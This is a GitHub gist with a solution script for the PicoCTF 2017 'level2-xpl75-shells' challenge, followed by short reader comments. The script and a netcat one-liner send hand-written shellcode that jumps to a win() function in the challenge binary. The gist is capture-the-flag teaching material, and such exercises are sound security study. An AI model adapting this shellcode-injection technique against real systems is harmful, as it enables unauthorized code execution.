Last active
May 16, 2018 19:57
-
-
Save intrd/b50399c58537d8c2ada3360b450bd40b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Solution to level2-xpl75-shells @ PicoCTF 2017 | |
| # @author intrd - http://dann.com.br/ | |
| # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
| # int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a | |
| import sys, socket, struct | |
| sys.path.append("../../LIBS/") | |
| from int_netcat import Netcat | |
| nc = Netcat("shell2017.picoctf.com", 55049) | |
| data=nc.read_until("10 bytes:\n") | |
| print(data) | |
| # win() = 0x08048540 | |
| # Custom shellcode | |
| # 0: 31 c0 xor eax,eax # clear eax | |
| # 2: bb 40 85 04 08 mov ebx,0x8048540 # mov win() address to ebx | |
| # 8: ff d3 call ebx # call ebx | |
| shellcode = "\x31\xc0"+ \ | |
| "\xbb"+"\x40\x85\x04\x08"+ \ | |
| "\xff\xd3" | |
| nc.write(shellcode) | |
| data=nc.read() | |
| print(data) | |
| # 1liner python -c 'print "\x31\xc0\xbb\x40\x85\x04\x08\xff\xd3"' | nc shell2017.picoctf.com 55049 |
What is the trick to determine that win() = 0x08048540?
I found out: objdump -d shell
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hey there. Could you explain why u needed
xor eax, eax?I did
and it worked fine.
Thanks in advance :)